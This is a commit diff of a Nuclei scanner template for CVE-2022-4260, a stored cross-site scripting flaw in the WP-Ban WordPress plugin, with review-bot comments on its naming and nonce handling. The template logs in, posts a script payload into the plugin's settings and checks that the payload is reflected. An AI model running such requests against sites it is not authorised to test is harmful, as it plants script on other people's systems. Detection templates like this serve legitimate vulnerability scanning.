rewrote-template-scratch

patch-1
Dhiyaneshwaran 2022-12-27 22:16:37 +05:30 committed by GitHub
parent a0e1e95043
commit f3e6069e81
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 31 deletions


@ -1,11 +1,12 @@
id: CVE-2022-4260 id: CVE-2022-4260
info: info:
name: WP-Ban < 1.69.1 - Admin+ Stored XSS name: WP-Ban < 1.69.1 - Admin Stored XSS
author: Hardik-Solanki author: Hardik-Solanki
severity: high severity: high
description: | description: |
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
remediation: Fixed in version 1.69.1
reference: reference:
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
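Review bot: The rename from "Admin+ Stored XSS" to "Admin Stored XSS" in the `name:` line drops the "+" that marks the required privilege as admin or higher, which is the convention the WPScan reference titles use and matches the description's "high privilege users such as admin"; keep `name: WP-Ban < 1.69.1 - Admin+ Stored XSS`. The added `remediation: Fixed in version 1.69.1` line is a good addition and agrees with the version bound in the name.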
@ -15,43 +16,51 @@ info:
cwe-id: CWE-79 cwe-id: CWE-79
metadata: metadata:
verified: "true" verified: "true"
tags: cve,cve2022,xss,wordpress,wp-plugin,wp-ban tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban
requests: requests:
- raw: - raw:
- | - |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 POST /wp-login.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: {{Hostname}}/wp-admin/options-general.php?page=wp-ban%2Fban-options.php
Content-Type: application/x-www-form-urlencoded
Origin: {{RootURL}} Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check Cookie: wordpress_test_cookie=WP%20Cookie%20check
_wpnonce=d65eec14d6&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E&Submit=Save+Changes log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- | - |
POST / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
Host: {{Hostname}}
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
- |
GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XSS Referer: XSS
matchers-condition: and host-redirects: true
max-redirects: 2
cookie-reuse: true
req-condition: true
matchers: matchers:
- type: word - type: dsl
dsl:
- 'contains(body_4, "<script>alert(document.domain);</script>")'
- 'contains(content_type_4, "text/html")'
- 'status_code_4 == 200'
condition: and
extractors:
- type: regex
name: nonce
part: body part: body
words: group: 1
- "<script>alert(111);</script>" regex:
- '_wpnonce=([0-9a-z]+)'
- type: word internal: true
part: header
words:
- text/html
- type: status
status:
- 200
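Review bot: The `nonce` extractor is not tied to a specific response and its regex `_wpnonce=([0-9a-z]+)` matches the query-string form of a nonce rather than the options form's hidden field, so it is not clear which of the four responses supplies the value substituted into `_wpnonce={{nonce}}` in the third request; the second request fetches `/` rather than `/wp-admin/admin.php?page=wp-ban/ban-options.php`, and WordPress nonces are bound to an action, so a nonce picked up from an unrelated link on the homepage is unlikely to pass the options page's check. Consider fetching the ban-options page itself before the POST and matching the form's own nonce (for example a regex over `name="_wpnonce" value="..."` on that response), and add a comment explaining what the extractor captures and which request consumes it. The switch from a `word`/`header`/`status` matcher set to a single `dsl` matcher over `body_4`, `content_type_4` and `status_code_4` is consistent with the fourth request (the `Referer: XSS` GET that renders the banned template message) being the one that reflects the stored payload; `cookie-reuse: true` and `req-condition: true` are required for that and are present. One stylistic point: the long `raw` request lines that were shortened (the browser `Accept*` headers dropped) are fine to omit, but keep `Content-Type: application/x-www-form-urlencoded` on the third request, which now has no header declaring the form body.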